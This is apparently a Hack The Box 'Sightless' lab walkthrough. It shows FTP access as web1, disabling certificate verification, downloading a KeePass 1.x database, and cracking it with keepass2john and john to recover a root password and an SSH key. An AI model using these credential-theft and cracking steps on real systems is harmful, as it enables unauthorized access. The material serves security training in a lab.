InfoSec LAB

Sightless_Froxlor_FTP

Created: 2 min read

FTP

I have reset the password of the web1 account for the FTP server on the Froxlor admin panel

┌──(kali㉿kali)-[~/archive/htb/labs/sightless]
└─$ lftp -u web1 $IP
Password: Qwer1234
lftp web1@10.129.242.165:~>

Successfully authenticated to the FTP server

lftp web1@10.129.242.165:~> ls                     
ls: Fatal error: Certificate verification: The certificate is NOT trusted. The certificate issuer is unknown.  (A1:4B:95:93:0A:CF:15:CD:DD:52:68:ED:DB:5B:92:ED:F0:F3:3C:69)
lftp web1@10.129.242.165:~> set ssl:verify-certificate off

Disabling the SSL verification

index.html

lftp web1@10.129.242.165:~> ls
drwxr-xr-x   3 web1     web1         4096 May 17 03:17 goaccess
-rw-r--r--   1 web1     web1         8376 Mar 29 10:29 index.html

goaccess

lftp web1@10.129.242.165:/> get index.html
8376 bytes transferred

Downloaded the index.html file

KeePass DB

lftp web1@10.129.242.165:/> cd goaccess
lftp web1@10.129.242.165:/goaccess> ls
drwxr-xr-x   2 web1     web1         4096 Aug  2 07:14 backup

goaccess/backup

lftp web1@10.129.242.165:/goaccess> cd backup
lftp web1@10.129.242.165:/goaccess/backup> ls
-rw-r--r--   1 web1     web1         5292 Aug  6 14:29 Database.kdb

There is a KeePass DB file; Database.kdb

lftp web1@10.129.242.165:/goaccess/backup> get Database.kdb
5292 bytes transferred

Downloaded to Kali

┌──(kali㉿kali)-[~/archive/htb/labs/sightless]
└─$ file Database.kdb                                                                     
Database.kdb: Keepass password database 1.x KDB, 8 groups, 4 entries, 600000 key transformation rounds

It is indeed a KeePass DB file, but a very old version. 1.x

┌──(kali㉿kali)-[~/archive/htb/labs/sightless]
└─$ keepassxc Database.kdb

It’s password-protected

Password Cracking

┌──(kali㉿kali)-[~/archive/htb/labs/sightless]
└─$ keepass2john Database.kdb > Database.kdb.hash
Inlining Database.kdb

Turning the DB file into a crack-able hash string

┌──(kali㉿kali)-[~/archive/htb/labs/sightless]
└─$ john Database.kdb.hash --wordlist=/usr/share/wordlists/rockyou.txt       
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 600000 for all loaded hashes
Cost 2 (version) is 1 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bulldogs         (Database.kdb)     
1g 0:00:00:22 DONE (2024-09-08 13:29) 0.04490g/s 47.41p/s 47.41c/s 47.41C/s bullshit..stars
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

john cracked the password hash The cracked DB password is bulldogs

Unlocked

Importing (Unlocking)

Unlocked.

There is a single entry It appears to be the credential of the root account root:q6gnLTB74L132TMdFCpK

There is also an attachment; id_rsa I will save that into the current directory Moving on to the Privilege Escalation phase

Interactive Graph View

Backlinks